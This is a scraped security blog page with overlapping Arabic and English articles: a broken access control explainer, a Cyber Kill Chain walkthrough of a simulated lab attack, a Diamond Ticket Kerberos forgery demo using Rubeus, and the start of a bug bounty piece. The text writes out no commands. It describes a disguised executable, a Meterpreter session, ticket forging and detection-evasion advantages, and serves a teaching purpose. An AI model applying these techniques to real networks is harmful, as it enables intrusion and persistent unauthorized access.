ببساطة، تحدث هذه الثغرة عندما يفشل نظام ما في تطبيق قواعد صارمة للتحكم بالوصول إلى البيانات. تخيل مكتبة ضخمة لا تتحكم بدخول وخروج الزوار، فبإمكان أي شخص الدخول والعبث بالكتب أو سرقتها! تتيح ثغرة ضعف التحكم بالوصول للمتطفلين القيام بأفعال مماثلة، حيث يمكنهم:

<ul>
	<li>سرقة البيانات الحساسة: كمعلومات العملاء أو الملكية الفكرية.</li>
	<li>إحداث تغييرات غير مصرح بها: تعديل أو حذف البيانات، مما يؤدي إلى نتائج وخيمة.</li>
	<li>انتحال شخصية مستخدم شرعي: استغلال صلاحيات مستخدم آخر للقيام بأفعال ضارة.</li>
</ul>

<img alt="" src="/media/blog/2024/06/09/access-control_mGv8XV9.svg" style="height:461px; width:781px" />

هذه الثغرة مدرجة ضمن أخطر عشر مخاطر أمن تطبيقات الويب حسب قائمة أوامر أمن الويب المفتوحة (OWASP) لعام 2021، مما يوضح مدى جديتها.

<h2>أمثلة على ثغرات ضعف التحكم بالوصول وكيفية التصدي لها:</h2>

<ul>
	<li>
	استغلال عناوين الارتباط (URL): يمكن للمتطفلين تعديل عناوين الارتباط للوصول إلى بيانات مستخدمين آخرين. على سبيل المثال، تحويل عنوان URL من &quot;صفحة مستخدم رقم 123&quot; إلى &quot;صفحة مستخدم رقم 456&quot; للوصول إلى معلومات خاصة بمستخدم آخر.
	</li>
	<li>استهداف نقاط الاتصال غير الآمنة: نقاط الاتصال مثل واجهات برمجة التطبيقات (APIs) والخدمات المصغرة (Microservices) عرضة للاختراق إذا لم تكن محصنة بشكل جيد.</li>
	<li>تصعيد امتيازات المستخدم: قد يستغل المهاجمون كلمات مرور ضعيفة للوصول إلى حساب مستخدم عادي ثم يرفعون صلاحياتهم للوصول إلى بيانات أكثر حساسية.</li>
	<li>مراجعات الكائنات المباشرة غير الآمنة (IDOR): عندما تكشف التطبيقات عن مراجعات داخلية مثل مفاتيح قواعد البيانات في عناوين الارتباط، يمكن للمتطفلين استغلالها للوصول إلى بيانات محددة.</li>
</ul>

&nbsp;

&nbsp;

<h2>التأثير والمخاطر الأمنية الجسيمة</h2>

يُشكل ضعفُ التحكم بالوصول ثغرةً أمنيةً جسيمةً يمكن أن تُحدث تداعياتٍ كارثية على المؤسسات. فبمجرد حصولِ المتسللين على صلاحياتٍ غير مصرحٍ بها للوصول إلى البيانات الحساسة، تتعرض المنظمة إلى مخاطر جسيمة تشمل:

<ul>
	<li>انتهاكات البيانات: حيث يمكن للمهاجمين سرقة معلومات حساسة مثل البيانات المالية أو الملكية الفكرية أو الأسرار التجارية.</li>
	<li>سرقة الهوية: قد يستخدم المهاجمون البيانات الشخصية المسروقة لانتحال صفة موظفين أو عملاء وانتحال شخصياتهم لأغراض خبيثة.</li>
	<li>خسائر مالية فادحة: يمكن أن تؤدي سرقة البيانات أو تعطيل العمليات إلى تكبد خسائر مالية جسيمة.</li>
	<li>إضرار بالسمعة البالغة: يُعد التعرض لانتهاكات البيانات ضربةً قويةً لسمعة المؤسسة وثقة عملائها.</li>
</ul>

وفي سيناريوهاتٍ أشد خطورة، قد يؤدي ضعفُ التحكم بالوصول إلى اختراق كامل للنظام حيث يسيطر المهاجمون سيطرةً تامةً عليه. هذا يعني تعريض سرية البيانات وسلامتها وتوافرها للخطر، إذ يصبح بإمكان المهاجمين حينئذٍ الوصول إلى أي معلومة على النظام أو تعديلها أو حتى حذفها بشكل كامل.

<img alt="" src="/media/blog/2024/06/09/broken-access-control_v7Nf8ec.jpg" style="height:561px; width:872px" />

&nbsp;

<h2>لمكافحة هذه الثغرات، نحتاج إلى تحصين أنظمة التحكم بالوصول. إليك بعض الاستراتيجيات الفعالة:</h2>

<ul>
	<li>مبدأ امتياز الأقل (PoLP): منح المستخدمين فقط الصلاحيات الضرورية لأداء مهامهم.</li>
	<li>إدارة جلسات آمنة: إنشاء جلسات فريدة لكل مستخدم وتدميرها تلقائيا بعد الخروج أو عدم النشاط.</li>
	<li>المصادقة القوية: استخدام تقنيات مثل المصادقة الثنائية (MFA) لتعزيز عملية التحقق من هوية المستخدمين.</li>
	<li>المراجعة الدورية: إجراء مراجعات منتظمة لنظام التحكم بالوصول للكشف عن الثغرات ومعالجتها.</li>
	<li>تسجيل الأحداث: تسجيل جميع محاولات الوصول إلى البيانات ومراقبة أي سلوك مشبوه.</li>
</ul>

باستخدام هذه الإجراءات الوقائية، يمكننا بناء دفاعات متينة ضد ثغرات ضعف التحكم بالوصول وحماية بياناتنا الثمينة. تذكر، الأمن مسؤولية مشتركة، وكل خطوة نحو تعزيز أمن المعلومات تساهم في بيئة رقمية أكثر أمانا للجميع.

Broken-Access-Control-Vulnerability

A broken access control vulnerability is a critical security flaw that allows unauthorized users to access, modify, or delete data they should not have access to. This issue arises when an application fails to enforce proper access controls, enabling attackers to bypass authorization and perform actions as if they were legitimate users. Recognized as one of the most severe web application security risks

في عالم يعتمد بشكل متزايد على البيانات الرقمية الحساسة، يمثل ضمان أمن هذه البيانات أولوية قصوى. تبرز هنا ثغرة ضعف التحكم بالوصول (Broken Access Control) كتهديد كبير، إذ تسمح للمتطفلين بالولوج إلى معلومات لا يحق لهم الوصول إليها، مما يهدد سرية البيانات وسلامتها وتوافرها.

Broken Access Control Vulnerability

ثغرة ال Broken Access Control

<img alt="" src="/media/blog/2024/09/09/scrn1.png" style="height:788px; width:2000px" />

The Cyber Kill Chain framework is one of the frameworks that describes the steps a hacker goes through during the attack process. It was developed by Lockheed Martin for military use to describe the operations followed by attackers. It is worth noting that the steps followed by the attacker are similar to those in a cyber attack. Therefore, the framework is one of the important frameworks that cybersecurity specialists must understand. This becomes even more important if the specialist works in the defensive field. In this article, we will explain the steps of the framework, illustrating them with a practical scenario simulated in a virtual environment.

&nbsp;

<h2>Scenario:</h2>

&quot;FakeComp&quot; is a startup company specializing in UI/UX design.

<ul>
	<li>They do not have a dedicated cybersecurity department.</li>
	<li>They do not have an IT department.</li>
	<li>Employees: Design specialists and one HR staff member.</li>
	<li>The company has announced a job vacancy on their official website.</li>
</ul>

Note: Since the scenario is fictional, the steps will be performed in a virtual environment within an internal network. The company information is also fictional and was created to simulate the scenario.

&nbsp;

<h2>Cyber Kill Chain Stages:</h2>

Reconnaissance:

At this stage, the attacker gathers as much information as possible about the target. This information may include contact details, employee names and positions, website paths and domains (Domains &amp; Subdomains), information about services and open ports, the server version, or the content management system version if used. The information gathering process can be direct or indirect.

Direct reconnaissance (Active) refers to when the attacker gathers information through direct interaction with the target, such as using path guessing tools to discover website paths or using the nmap tool to scan ports.

Indirect reconnaissance (Passive) involves the attacker gathering information without the target knowing there is someone collecting information. This is done through tools or manually gathering information using Google Dork.

In the scenario, the attacker searched for the company and began gathering information using Google Dork.

<img alt="" src="/media/blog/2024/09/09/scrn2.png" style="height:532px; width:2000px" />

<img alt="" src="/media/blog/2024/09/09/scrn3.png" style="height:2689px; width:2000px" />

Here, the attacker was able to find the technical support email and the system administrator&rsquo;s email.

Weaponization:

After gathering the information, the attacker starts planning how to reach the target by creating malicious software or exploiting any vulnerabilities if found. The attacker&rsquo;s goal here is to create the appropriate exploit depending on the target&#39;s condition.

<img alt="" src="/media/blog/2024/09/09/scrn4.png" />

The attacker created a malicious file named nawaf_cv.pdf to trick the employee into thinking the file is a .pdf, while in reality, it is an executable file in .exe format.

&nbsp;

Delivery:

In this stage, the attacker thinks of a method to deliver the malicious software they have created to the targeted device. The attacker attempts to use various persuasion techniques to carry out the attack. The goal here is to get the target to interact with the malicious software, whether it&rsquo;s a malicious file, clicking on a link, or inserting storage media into the devices.

<img alt="" src="/media/blog/2024/09/09/scrn5.png" style="height:1109px; width:2000px" />

Here, the attacker sent a malicious file to the recruitment manager&rsquo;s email and attached the file in the form of a link that directly downloads the file.

Exploitation:

The attacker exploits existing vulnerabilities to gain access to the target system. The goal at this step is to exploit the delivered malicious software to gain access to the system and then control it. This mechanism depends on the type of vulnerability and the target to determine the appropriate tools and exploitation method.

<img alt="" src="/media/blog/2024/09/09/scrn6.png" style="height:600px; width:2000px" />

The attacker used the Metasploit Framework to create a Meterpreter session and wait for any connection from the targeted device.

<img alt="" src="/media/blog/2024/09/09/scrn7.png" style="height:1151px; width:2000px" />

The employee clicked on the file thinking it was a PDF, but nothing appeared on the screen, so they assumed the file was not working and deleted it. What the employee didn&rsquo;t realize is that the hacker had already gained access to the system in the background.

&nbsp;

<img alt="" src="/media/blog/2024/09/09/scrn8.png" style="height:538px; width:2000px" />

Installation:

The attacker begins installing themselves onto the device to maintain the access they have gained. The goal at this stage is to ensure continuous access to the target even after connection loss or a reboot. This is done by executing certain commands that install other software to guarantee persistent access.

&nbsp;

<img alt="" src="/media/blog/2024/09/09/scrn9.png" style="height:660px; width:2000px" />

The attacker used one of the exploits in Metasploit to install software that ensures persistent access to the system.

Command &amp; Control (C2):

The attacker creates a communication channel between themselves and the compromised system to control it and execute commands. They might also add the device to a network of compromised systems to use them in other operations. Furthermore, the attacker does not stop at compromising a single device but will attempt to spread to other devices in the network to compromise as many systems as possible and cause greater damage.

<img alt="" src="/media/blog/2024/09/09/scrn10.png" style="height:1050px; width:2000px" />

Actions on Objectives:

Once the attacker has successfully installed themselves and established a communication channel, opening backdoors, they begin to achieve their objectives, which may vary depending on the attacker&rsquo;s intentions. These objectives could include stealing data, spying, compromising other systems, or using the compromised systems in other attacks.

<img alt="" src="/media/blog/2024/09/09/scrn11.png" style="height:862px; width:2000px" />

One example at this stage is when the attacker downloads sensitive or important files from the targeted system and starts a data leak.

<img alt="" src="/media/blog/2024/09/09/scrn1_DpBhM8L.png" style="height:788px; width:2000px" />

يعد إطار Cyber Kill Chain أحد الأُطر التي تصف الخطوات التي يمر بها المخترق أثناء عملية الهجوم وقد تم تطويره بواسطة شركة لوكهيد مارتن للاستعمال العسكري لوصفه العمليات المتبعة للمهاجمين الجدير بالذكر أن الخطوات المتبعة للمهاجم مشابهة للخطوات في الهجوم السيبراني، ولذلك يعد الإطار أحد الأطر المهمة التي يجب على مختصّي الأمن السيبراني فهمها ويزداد الأمر أهمية في حال كان المختص من المجال الدفاعي، في هذا المقال سنتطرق لشرح خطوات الإطار مع توضيحها بسيناريو عملي ومحاكاته على بيئة افتراضية.

&nbsp;

<h2 dir="rtl" style="text-align:right">السيناريو:</h2>

تعد شركة &quot;FakeComp&quot; أحد الشركات الناشئة في مجال تصميم واجهات المستخدم وتجربة المستخدم UI/UX 
- لا يوجد لديهم قسم خاص للأمن السيبراني 
- لا يوجد لديهم قسم لتقنية المعلومات 
- الموظفين: متخصصين بالتصميم، وشخص من قسم الموارد البشرية HR 
- أعلنت الشركة عن شاغر وظيفي في الموقع الرسمي 
تنويه: بحكم ان السيناريو تخيلي فالخطوات ستكون على بيئة افتراضية بشبكة داخليه بالإضافة الى ان معلومات الشركة غير واقعيه وتم صنعها لمحاكاة السيناريو. 
 
مراحل إطار Cyber Kill Chain:

الاستطلاع (Reconnaissance):

في هذه المرحلة يقوم المهاجم بجمع أكبر قدر ممكن من المعلومات عن الهدف ، قد تكون المعلومات مثل: معلومات التواصل، أسماء الموظفين ومناصبهم، مسارات الموقع والنطاقات (Domains &amp; Subdomains) ، معلومات عن الخدمات والمنافذ المفتوحة أو اصدار الخادم او اصدار نظام إدارة المحتوى إن كان مستَخدم، وعملية جمع المعلومات قد تكون بشكل مباشر او غير مباشر. 
يقصد بالاستطلاع بشكل مباشر (Active) وفيها يقوم المهاجم بجمع المعلومات من خلال الاتصال المباشر بالهدف مثل استعمال أدوات التخمين على المسارات لمعرفة مسارات الموقع، او استعمال أداة nmap لفحص المنافذ. 
يقصد بالاستطلاع بشكل غير مباشر (Passive) يقوم المهاجم بجمع المعلومات دون معرفة الهدف بوجود مهاجم يجمع المعلومات ويتم ذلك من خلال استعمال بعض الأدوات او جمع المعلومات يدويًا من خلال Google Dork.

&nbsp;

بالعودة الى السيناريو، هنا قام المهاجم بالبحث عن الشركة وبدأ بجمع المعلومات من خلال Google Dork

<img alt="" src="/media/blog/2024/09/09/scrn2_WAB5Dm0.png" style="height:532px; width:2000px" />

<img alt="" src="/media/blog/2024/09/09/scrn3_tsC62Tk.png" style="height:2689px; width:2000px" />

هنا استطاع المهاجم العثور على البريد الخاص بالدعم الفني وبريد المسؤول عن النظام.

&nbsp;

التسليح (Weaponization):

بعد أن قام المهاجم بجمع المعلومات يبدأ بالتفكير بكيفية الوصول للهدف من خلال انشاء البرمجيات الضارة أو استغلال بعض الثغرات إن وجدت ويكون هدف المهاجم هنا بإنشاء الاستغلال المناسب تبعًا لحالة الهدف.

<img alt="" src="/media/blog/2024/09/09/scrn4_AJnI7Dh.png" style="height:452px; width:2000px" />

قام المهاجم بإنشاء ملف ضار باسم nawaf_cv.pdf لخداع الموظف بالاعتقاد أن الملف بصيغة .pdf بينما هو في الحقيقة ملف تنفيذي بصيغة .exe&nbsp;

التسليم (Delivery) :

يقوم المهاجم في هذه المرحلة بالتفكير بوسيلة لإيصال البرمجيات الضارة التي قام بإنشائها الى الجهاز المستهدف، ويحاول المهاجم في هذه المرحلة استخدام وسائل متعددة للإقناع لتنفيذ الهجوم. والهدف منها هو جعل المستهدف يتفاعل مع البرمجيات الضارة، سواء كانت ملف ضار أو النقر على رابط، أو ادخال وسائط التخزين الى الأجهزة.

<img alt="" src="/media/blog/2024/09/09/scrn5_kuWu8Bu.png" style="height:1109px; width:2000px" />

هنا قام المهاجم بإرسال ملف ضار إلى البريد الإلكتروني الخاص بمسؤول التوظيف، وقد أرفق الملف في شكل رابط يؤدي إلى تنزيل الملف مباشرة.

&nbsp;

الاستغلال (Exploitation):

يقوم المهاجم باستغلال الثغرات المتواجدة للحصول على وصول للنظام المستهدف، والهدف في هذه الخطوة ان يتم الاستغلال من خلال تنفيذ البرمجيات الضارة التي تم تسليمها للوصول الى النظام ومن ثم التحكم به، وتعتمد تلك الآلية على نوع الثغرة والهدف لتحديد الأدوات والاستغلال المناسب.

<img alt="" src="/media/blog/2024/09/09/scrn6_lw20xDg.png" />

قام المهاجم باستخدام Metasploit Framework لإنشاء جلسة Meterpreter والانتظار لأي اتصال يتم من الجهاز المستهدف

&nbsp;

<img alt="" src="/media/blog/2024/09/09/scrn7_iTMlPiB.png" style="height:1151px; width:2000px" />

قام الموظف بالنقر على الملف معتقدًا أنه ملف PDF، ولكن لم يظهر له أي شيء، فافترض أن الملف لا يعمل وقام بحذفه. ما لم يدركه الموظف هو أن المخترق تمكن من الحصول على وصول للنظام في الخلفية

&nbsp;

<img alt="" src="/media/blog/2024/09/09/scrn8_CFmxtGp.png" style="height:538px; width:2000px" />

التثبيت (Installation):

يبدأ المخترق بتثبيت نفسه في الجهاز لكيلا يفقد الوصول الذي حصل عليه، والهدف في هذه المرحلة أن يضمن الوصول المستمر للهدف حتى بعد انقطاع الاتصال او إعادة التشغيل ويتم ذلك من خلال تنفيذ بعض الأوامر التي تقوم بتثبيت برمجيات أخرى لضمان استمرارية الوصول.

<img alt="" src="/media/blog/2024/09/09/scrn9_okF1HC0.png" style="height:660px; width:2000px" />

قام المخترق باستعمال أحد الاستغلالات في Metasploit لتثبيت برمجيات تضمن له الوصول المستمر على النظام

 
القيادة والسيطرة (Command &amp; Control C2):

يقوم المهاجم بإنشاء قناة للتواصل بينه وبين النظام المخترق ليتمكن من التحكم بالنظام وتنفيذ الاوامر، او ضم الجهاز لشبكة من الاجهزة المخترقة واستعمالها بعمليات أخرى، بل أيضًا أن المخترق لا يكتفي باختراق جهاز فقط، بل سيحاول الانتشار لاختراق الأجهزة الأخرى في الشبكة ليخترق أكبر قدر ممكن ويكون ضرره أعلى في المرحلة الأخيرة.

&nbsp;<img alt="" src="/media/blog/2024/09/09/scrn10_ZN1YjXS.png" style="height:1050px; width:2000px" />

الإجراءات على الأهداف (Actions on objectives):

وبعد أن يتمكن المهاجم من تثبيت نفسه وإنشاء قناة اتصال وفتح منافذ خلفية، يبدأ في تحقيق الأهداف التي قد تتغير حسب نوايا المهاجم. قد تشمل هذه الأهداف سرقة البيانات، أو التجسس، أو اختراق الأنظمة الأخرى، أو استخدام الأنظمة المصابة في هجمات أخرى.

<img alt="" src="/media/blog/2024/09/09/scrn11_lqHdW3c.png" style="height:862px; width:2000px" />أحد الأمثلة في هذه المرحلة ان يقوم المهاجم بتنزيل بعض الملفات الخاصة التي قد تكون حساسة أو مهمة من النظام المستهدف ويبدأ في عملية تسريب للبيانات.

&nbsp;

Cyber-Kill-Chain

The Cyber Kill Chain framework is one of the frameworks that describes the steps a hacker goes through during the attack process. It was developed by Lockheed Martin for military use to describe the operations followed by attackers. It is worth noting that the steps followed by the attacker are similar to those in a

يعد إطار Cyber Kill Chain أحد الأُطر التي تصف الخطوات التي يمر بها المخترق أثناء عملية الهجوم وقد تم تطويره بواسطة شركة لوكهيد مارتن للاستعمال العسكري لوصفه العمليات المتبعة للمهاجمين الجدير بالذكر أن الخطوات المتبعة للمهاجم مشابهة للخطوات في الهجوم السيبراني، ولذلك يعد الإطار أحد الأطر المهمة التي

Cyber Kill Chain

<h2>Introduction</h2>

In the ever-changing field of cybersecurity, advanced attack methods like Golden, Silver, and Diamond Ticket attacks pose significant threats to organizations. These attacks exploit weaknesses in the Kerberos authentication system within Active Directory (AD), allowing attackers to gain long-term and often undetectable access to important network resources. Among these, the Diamond Ticket attack is particularly sophisticated. By combining aspects of both Golden and Silver Ticket attacks, it improves operational security (OPSEC) and becomes harder to detect.

<h2>Kerberos Authentication</h2>

To understand the ticket attacks and their implications, it helps to understand a few things about how Kerberos works. This includes some common terms for features used in these attacks, as well as the structure of how tickets are used.

Kerberos is a network authentication protocol that is primarily used in Active Directory (AD) environments. Thousands of companies across different industries use Active Directory technology for managing user accounts and other resources within an organization. Active Directory&rsquo;s first version was released in Windows Server 2000 and since then, it has become particularly common in businesses and other large organizations that have a significant number of users and resources to manage.

Kerberos provides strong authentication by issuing tickets to authenticate users and allow access to services. The tickets are distributed by the key distribution center (KDC). In most environments, the KDC is installed on the domain controller (DC).

During the initial authentication, a Ticket Granting Ticket (TGT) is a ticket assigned to a user. The TGT is later used to authenticate the user to the KDC and request a service ticket from the Ticket Granting Service (TGS). Service tickets are granted for authentication against services.

A Kerberos authentication would consist of the following steps:

<ol>
	<li>AS-REQ (Authentication Service Request): The user requests a TGT from the KDC and the KDC verifies and validates the credentials and user information.</li>
	<li>AS-REP (Authentication Service Reply): After authenticating the user, the KDC sends an encrypted TGT back to the requester.</li>
	<li>TGS-REQ (Ticket Granting Service Request): The user presents the TGT to the DC and requests a TGS.</li>
	<li>TGS-REP (Ticket Granting Service Reply): The TGS is encrypted and sent back to the requesting user.</li>
	<li>AP-REQ (Application Request): The user connects to the server hosting the service requested and presents the TGS to access the service.</li>
	<li>AP-REP (Application Reply): The application server sends a response to the client.</li>
</ol>

<img alt="" src="/media/blog/2024/07/15/figure-1_i4tXtSE.png" style="height:864px; width:2000px" />

<h2>Theory Diamond Ticket Attack</h2>

In order to perform such an attack, the basic requirement is that the adversary needs access to the KRBTGT account&rsquo;s password hash.

The KRBTGT account encrypts and signs all the Kerberos TGT tickets for the domain. All verification of Kerberos tickets, including encrypting and decrypting TGTs for the KDC service, is done by the KRBTGT. This means a forged TGT will be considered a valid ticket simply because it was encrypted with the KRBTGT account.

Moreover, the adversary has to encrypt the forged TGT with the KRBTGT password hash once the TGT is forged, to make sure the new TGT will pass the KDC&rsquo;s verification and issue a service ticket to the desired service.

With that being said, it&rsquo;s important to remember that getting the KRBTGT password hash is not an easy task. Doing so not only provides access to all the services and resources in the domain, but also enables network persistence.

&nbsp;

<h2>Practical Diamond Ticket Attack</h2>

We will begin the attack by attempting to access the C$ File Share (CIFS, Common Internet File System) on a DC using a low-privileged user (Loki). As shown below, we get an &quot;Access is denied&quot; response.<img alt="" src="/media/blog/2024/07/15/figure-2.jpeg" style="height:594px; width:2000px" />

&nbsp;





Assuming we have previously compromised the KRBTGT key, we can use the new diamond command in Rubeus to create a Diamond Ticket. This command first requests a normal TGT for the low-privileged user Loki; it then decrypts it, modifies the relevant parts, recalculates the signatures, and re-encrypts it.

<img alt="" src="/media/blog/2024/07/15/figure-3.jpeg" style="height:1069px; width:2000px" />

<img alt="" src="/media/blog/2024/07/15/figure-4_zDDDyqJ.jpeg" style="height:836px; width:2000px" />

The resulting ticket can then be used like any other TGT, but now with the modifications. We then request an ST (Service Ticket) to the CIFS service on our target DC (Earth-DC).

&nbsp;

<img alt="" src="/media/blog/2024/07/15/figure-5.jpeg" style="height:1466px; width:2000px" />

Lastly, in the same terminal, we can now access the C$ share on the DC, authenticating as a different user than the account that requested the TGT.

&nbsp;

<img alt="" src="/media/blog/2024/07/15/figure-6.jpeg" style="height:1338px; width:2000px" />

<h2>OPSEC Advantages (Golden vs Diamond Tickets)</h2>

There are many potential ways to detect Golden Ticket usage or actions required to gain access to the KRBTGT key (like DCSync). One technique is to monitor for ST requests (TGS-REQs) that have no corresponding TGT request (AS-REQ). The &lsquo;Diamond Ticket&rsquo; technique makes it more likely to bypass this type of detection by requesting a valid TGT before using the resulting ticket. Additionally, as the ticket is first created by a DC, some values (for example, the ticket times) are more likely to be correct by default, rather than the requirement of calculating the proper times for OPSEC Golden Ticket creation.



&nbsp;

<h2>مقدمة</h2>

تُشكل الهجمات المتطورة، مثل هجمات التذاكر الذهبية والفضية والالماسية، تهديدًا متزايدًا للأمن السيبراني في المؤسسات. يتم استغلال هذه الهجمات والثغرات الأمنية في نظام مصادقة كيربيروس ضمن دليل Active Directory (AD)، مما يتيح للهاكرز الوصول غير المكتشف وطويل الأمد إلى موارد الشبكة الحساسة. ومن بين هذه الهجمات، يُعد هجوم التذكرة الألماسية الأكثر تعقيداً، حيث يجمع بين خصائص هجمتي التذاكر الذهبية والفضية، مما يعزز من قدرة الهاكر على الحفاظ على استمرارية الوصول ويعقد من صعوبة اكتشاف الهجوم.

&nbsp;

<h2>ماهي مصادقة كيربيروس؟؟</h2>

لفهم هجمات التذاكر وآثارها، من الضروري فهم آلية عمل بروتوكول كيربيروس، بما في ذلك المصطلحات والمكونات الأساسية المستخدمة في هذه الهجمات.

يُعد كيربيروس بروتوكول مصادقة شبكية يُستخدم بشكل رئيسي في بيئات دليل Active Directory (AD). تعتمد آلاف الشركات في مختلف القطاعات على تقنية Active Directory لإدارة حسابات المستخدمين والموارد الأخرى داخل المنظمة. وقد اكتسبت هذه التقنية انتشاراً واسعاً منذ إطلاقها مع نظام التشغيل Windows Server 2000، لا سيما في المؤسسات الكبيرة التي تدير عدداً كبيراً من المستخدمين والموارد.

يعتمد كيربيروس على نظام قوي للمصادقة من خلال إصدار تذاكر للمستخدمين للسماح لهم بالوصول إلى الخدمات. يتم توزيع هذه التذاكر بواسطة مركز توزيع المفاتيح (KDC)، والذي يتواجد عادة على وحدة التحكم بالمجال (DC).

في عملية المصادقة الأولية، يتم إصدار منح التذكرة (TGT) للمستخدم. تستخدم هذه التذكرة لاحقاً لمصادقة المستخدم لدى مركز توزيع المفاتيح وطلب منح تذكرة خدمة&nbsp; (TGS). تُمنح تذاكر الخدمة للمصادقة عند الوصول إلى خدمات محددة.

&nbsp;

تتضمن عملية المصادقة في كيربيروس الخطوات التالية:

<ul>
	<li>طلب خدمة المصادقة (AS-REQ): يطلب المستخدم تذكرة منح التذكرة (TGT) من مركز توزيع المفاتيح، والذي يقوم بالتحقق من صحة بيانات الاعتماد ومعلومات المستخدم.</li>
	<li>رد خدمة المصادقة (AS-REP): بعد التأكد من صحة بيانات الاعتماد، يرسل مركز توزيع المفاتيح تذكرة منح التذكرة المشفرة إلى المستخدم.</li>
	<li>طلب خدمة منح التذكرة (TGS-REQ): يعرض المستخدم تذكرة منح التذكرة على وحدة التحكم بالمجال ويطلب تذكرة خدمة.</li>
	<li>رد خدمة منح التذكرة (TGS-REP): يتم تشفير تذكرة الخدمة وإرسالها إلى المستخدم.</li>
	<li>طلب التطبيق (AP-REQ): يتصل المستخدم بخادم الخدمة المطلوبة ويعرض تذكرة الخدمة للوصول إلى الخدمة.</li>
	<li>رد التطبيق (AP-REP): يرسل خادم التطبيق استجابة إلى العميل.</li>
</ul>

<img alt="" src="/media/blog/2024/07/15/figure-1_XFA5wqO.png" style="height:864px; width:2000px" />

<h2>هجوم التذكرة الألماسية نظرياً</h2>

لتنفيذ هجوم التذكرة الألماسية، يتطلب الهاكر في البداية الحصول على هاش كلمة مرور حساب KRBTGT. يستخدم هذا الحساب لتشفير وتوثيق جميع تذاكر منح التذكرة (TGT) في المجال. يتم التحقق من صحة جميع تذاكر كيربيروس، بما في ذلك تشفير وفك تشفير تذاكر منح التذكرة، بواسطة حساب KRBTGT. وبالتالي، فإن أي تذكرة منح تذكرة مزورة ستعتبر صحيحة إذا تم تشفيرها باستخدام هاش كلمة مرور حساب KRBTGT.

بالإضافة إلى ذلك، يجب على الهاكر تشفير تذكرة منح التذكرة المزورة باستخدام هاش كلمة مرور حساب KRBTGT لضمان قبولها من قبل مركز توزيع المفاتيح وإصدار تذكرة خدمة للخدمة المستهدفة.

يُعتبر الحصول على هاش كلمة مرور حساب KRBTGT مهمة صعبة للغاية. ولكن نجاح الهاكر في ذلك يمنحه ليس فقط الوصول إلى جميع الخدمات والموارد في المجال، بل أيضاً القدرة على الحفاظ على وجود مستمر في الشبكة.

<h2>هجوم التذكرة الألماسية عملياً</h2>

لإظهار كيفية عمل الهجوم، سنحاول الوصول إلى مشاركة الملفات C$ على وحدة تحكم المجال باستخدام حساب مستخدم محدود الصلاحيات (Loki). كما هو متوقع، سيتم رفض الطلب.

<img alt="" src="/media/blog/2024/07/15/figure-2_ixbaOZO.jpeg" style="height:594px; width:2000px" />

بافتراض حصولنا على مفتاح KRBTGT، يمكننا استخدام الأداة Rubeus لإنشاء تذكرة الماس. تقوم هذه الأداة بطلب تذكرة منح تذكرة عادية لحساب Loki، ثم تقوم بفك تشفيرها وتعديل الحقول اللازمة وإعادة حساب التوقيعات وإعادة تشفيرها.

<img alt="" src="/media/blog/2024/07/15/figure-3_1foSEXM.jpeg" style="height:1069px; width:2000px" />

<img alt="" src="/media/blog/2024/07/15/figure-4_riXsgIm.jpeg" style="height:836px; width:2000px" />

يمكن استخدام التذكرة هذه مثل أي تذكرة منح تذكرة أخرى، ولكن مع التعديلات التي تم إجراؤها. يجب عليك ان نطلب تذكرة خدمة لخدمة CIFS على وحدة التحكم بالمجال المستهدف (Earth-DC).

&nbsp;

<img alt="" src="/media/blog/2024/07/15/figure-5_qgYLIvf.jpeg" style="height:1466px; width:2000px" />



وأخيراً، يمكننا الوصول إلى مشاركة الملفات C$ على وحدة التحكم بالمجال باستخدام حساب مختلف عن الحساب الذي تم طلب تذكرة منح التذكرة له.

&nbsp;

<img alt="" src="/media/blog/2024/07/15/figure-6_8G9ZgDi.jpeg" style="height:1338px; width:2000px" />

<h2>مزايا أمن العمليات (OPSEC) في تذاكر الذهب والماس</h2>

توجد العديد من الطرق المحتملة لاكتشاف استخدام التذكرة الذهبية أو الكشف عن الأنشطة اللازمة للحصول على مفتاح حساب KRBTGT (مثل هجوم DCSync). إحدى هذه الطرق هي مراقبة طلبات تذاكر الخدمة (TGS-REQ) التي لا تتوافق مع طلبات تذاكر منح التذكرة (AS-REQ).

تتميز تقنية التذكرة الألماسية بقدرتها على تجاوز هذا النوع من الكشف عن طريق طلب تذكرة منح تذكرة صالحة قبل استخدام التذكرة المعدلة. بالإضافة إلى ذلك، نظرًا لأن التذكرة يتم إنشاؤها بواسطة وحدة التحكم بالمجال، فمن المرجح أن تكون بعض قيم التذاكر، مثل الأوقات، صحيحة بشكل افتراضي، مما يقلل من الحاجة إلى حساب هذه القيم بدقة كما هو الحال في التذكرة الذهبية.

Diamond-Ticket-Attack

In the ever-changing field of cybersecurity, advanced attack methods like Golden, Silver, and Diamond Ticket attacks pose significant threats to organizations. These attacks exploit weaknesses in the Kerberos authentication system within Active Directory (AD), allowing attackers to gain long-term and often undetectable access to important network resources. Among these, the Diamond Ticket attack is

تُشكل الهجمات المتطورة، مثل هجمات التذاكر الذهبية والفضية والالماسية، تهديدًا متزايدًا للأمن السيبراني في المؤسسات. يتم استغلال هذه الهجمات والثغرات الأمنية في نظام مصادقة كيربيروس ضمن دليل Active Directory (AD)، مما يتيح للهاكرز الوصول غير المكتشف وطويل الأمد إلى موارد الشبكة الحساسة. ومن بين هذه الهجمات، يُعد هجوم التذكرة الألماسية الأكثر تعقيداً، حيث يجمع بين خصائص هجمتي التذاكر الذهبية والفضية، مما يعزز من قدرة

Diamond Ticket Attack

هجمة ال Diamond Ticket

Bug bounties and Vulnerability Disclosure Programs (VDPs) are widely embraced by organizations worldwide. However, many individuals still struggle to grasp their appropriate usage and the differences between them. This article aims to provide clarity by defining bug bounty programs and VDPs and exploring scenarios for public and private program variations.

&nbsp;

<h2>How Are Bug Bounty Programs and Vulnerability Disclosure Programs Different?&nbsp;</h2>

Bug bounties and VDPs share a common goal: collecting vulnerability reports from third parties, including security researchers, ethical hackers, partners, customers, or concerned citizens. These programs involve rules of engagement, a specified scope, a submission process (often through a web form), and an evaluation and response mechanism. Both aim to establish an official channel for submitting vulnerabilities, ensuring finders are not discouraged or ignored when reporting them.The primary distinction between bug bounties and VDPs lies in their incentive models. Bug bounties offer monetary rewards, known as bounties, for valid submissions, motivating individuals to submit vulnerabilities. In contrast, VDPs primarily express appreciation and recognition towards finders, treating their contributions more as voluntary efforts. While some VDPs may offer small tokens of gratitude like merchandise, these are gestures of thanks rather than incentives.

&nbsp;

<h2>How Do You Decide if You Should Run a Bug Bounty Program, a Vulnerability Disclosure Program, or Both?</h2>

